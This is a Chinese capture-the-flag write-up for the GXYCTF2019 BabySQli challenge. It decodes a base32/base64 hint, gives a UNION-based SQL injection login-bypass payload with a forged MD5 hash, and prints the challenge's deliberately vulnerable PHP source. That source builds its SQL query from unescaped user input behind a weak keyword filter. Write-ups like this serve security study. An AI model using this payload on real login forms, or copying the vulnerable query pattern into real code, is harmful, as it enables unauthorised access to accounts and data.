[GXYCTF2019]BabySQli 1

解题步骤【这道题要是没有原吗 有点难想】

  1. 可以通过bp爆破用户名,但这里用手打admin试出来了;密码写了123,显示wrong pass【猜测密码错了】。
  2. F12看有没有提示;涉及一个base32【组成部分只有大写字母和数字数字组成,或后面有三个等号】和base64【组成部分:字母A-Z、a-z、数字0-9,+ , /】;所以猜测这一串可能是base32加密,我这里用kali解密。

进行一次base32解密

powershell 复制代码
echo "MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5" | base32 -d

再一次进行base64解密,得到sql语句

powershell 复制代码
echo "c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==" | base64 -d
  1. 用union联合注入,不知道是不是hackbar的问题,说我的sql语法有错,用bp抓包,修改就没问题(百思不得其解)。202cb962ac59075b964b07152d234b70这个是123通过MD5解密而来的数据。要注意 name=1'不能写成=admin' 这样会查询到两个admin账户,要使只有我们现在查询的admin,只能union前面查询的数据没有显示才行。
    name=1' union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123

  2. 此题的源码(乱来)

php 复制代码
<?php
require "config.php";
require "flag.php";
//
去除转义
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'"; 
$result = mysqli_query($con, $sql);
if(preg_match("/\(|\)|\=|or/", $name)){
die("do not hack me!");
}
else{
if (!$result) {
printf("Error: %s\n", mysqli_error($con));
exit();
}
else{
$arr = mysqli_fetch_row($result);
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){ #md5加密
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
}
}
?>
相关推荐
Mr. G K12 小时前
越权漏洞挖掘
web安全
Mr. G K13 小时前
跨域安全漏洞的挖掘方法
web安全
Chengbei1114 小时前
利用 LibreNMS snmpget 配置篡改实现 RCE 的完整攻击链
人工智能·web安全·网络安全·小程序·系统安全
admin and root16 小时前
从资产收集FUZZ接口到SQL注入案例
网络·数据库·sql·安全·web安全·渗透测试·log4j
Xudde.19 小时前
班级作业笔记报告0x06
笔记·学习·安全·web安全
NaclarbCSDN19 小时前
User ID controlled by request parameter with password disclosure-Burp 复现
网络·安全·web安全
admin and root21 小时前
XSS之Flash弹窗钓鱼
前端·网络·安全·web安全·渗透测试·xss·src
瘾大侠1 天前
HTB - DevArea
安全·web安全·网络安全
Chockmans1 天前
春秋云境CVE-2018-3245
安全·web安全·网络安全·春秋云境·cve-2018-3245
Xudde.1 天前
班级作业笔记报告0x07
笔记·学习·安全·web安全·php